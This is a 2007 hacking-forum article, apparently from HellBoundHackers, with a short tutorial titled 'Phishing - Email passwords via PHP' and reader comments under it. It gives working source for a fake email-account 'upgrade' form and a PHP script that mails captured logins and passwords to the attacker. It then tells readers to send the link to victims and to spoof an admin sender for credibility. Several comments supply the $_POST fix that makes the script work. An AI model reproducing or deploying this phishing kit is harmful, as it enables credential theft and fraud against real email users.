Follow us on Twitter!
Few are those who can see with their own eyes and hear with their own hearts. - Albert Einstein
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 25
Guests Online: 19
Members Online: 6

Registered Members: 82885
Newest Member: ConiBE
Latest Articles

Phishing - Email passwords via PHP

Arrow Image It is simple, all you need to do this is server with PHP support, fake mailer and basic knowledge



Firstly, what is phishing?
Phishing is the way to steal informations about person (credit card number, name or password to any service), by masquerading as a trustworthy person or business in an electronic communication. It is typically carried out using email or an instant messenger, we will use just e-mail.
The way to do this is PHP. We create simple HTML form with PHP script, which send input data to our email.
Now have a look on it:

What we need?
server with PHP support
fake mailer
basic knowledge

How it works?
There are two php files, one is form.php, second is perform.php . In form.php is form, which requires login and pass to e-mail. When user enter it and click on Submit, form.php sends input to perform.php, where is input sended to your e-mail. Simple, huh?

Sources:

form.php
Code

<html>
<body>

<form action="perform.php" method="post">
<h1>Want more space?? Upgrade your account to 4 GB!!!</h1>
<b>Information about E-Mail Account:</b><br>
Login:  <input type="text" name="login" /><br>
<br>
Pass:  <input type="text" name="pass" /><br>
<br>
I want upgrade: <input type="checkbox"  disabled="yes" checked="yes" name="iwant" />
<input type="submit" value="Submit">
</form>

</body>
</html>





perform.php
Code

<?php
$to = "your-email@provider.etc";
$subject = "Password of user $login";
$message = "Hello! Password of user $login is $pass";
$from = "something@something.etc";
$headers = "From: $from";
mail($to,$subject,$message,$headers);
echo "User $login successfully upgraded";
?>




Next step...
Now change email in perform.php to your email and upload both files on server. Send to victim url to form.php with some nice comment... :D (for example: yourdomain.com/form.php), or, and this is better, send this from admin, or webmaster email (for example: admin@emailprovider.etc) for better effect (for this use fake mailer) ;) .

Thats all for now, friends!!

Comments

-The_Flash-on February 13 2007 - 20:28:12
Excellent article Smile
netfishon February 13 2007 - 20:54:06
good job! went right to it. watch grammatical errors next time, besides that keep it up.
mastergameron February 13 2007 - 21:41:21
Great article, however you missed the $_POST stuff out from perform.php Wink
-The_Flash-on February 13 2007 - 23:09:12
You wouldn't need it mastergamer... it's not writing to file. It's emailing directly and the mail headers look okay to me. Although I may end up standing corrected xD
dontspitonmeon February 14 2007 - 00:57:48
he never defined $login and $pass
chislamon February 14 2007 - 01:16:52
that is true unless he is using register_globals otherwise use
Code
$login = $_POST['login']; $pass = $_POST['pass'];


chislamon February 14 2007 - 01:17:41
ugh use seperate lines tho, for some reason it didn't go on to different lines when i posted it
tonzofgunz25on February 14 2007 - 03:06:12
i like it!
dancucon February 14 2007 - 09:28:49
thx all for comments Smile this is my first article, so i will try write better next time... yeah i dont defined $login and $pass because i decided they are unnecessary. I tested it and it works fine Wink
Uber0non February 14 2007 - 12:03:48
Well done B)
bl4ckc4ton February 14 2007 - 17:58:42
yes, i was also going to say, you missed the _post stuff, but, you were already corrected by the others -Bl4ckc4t
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.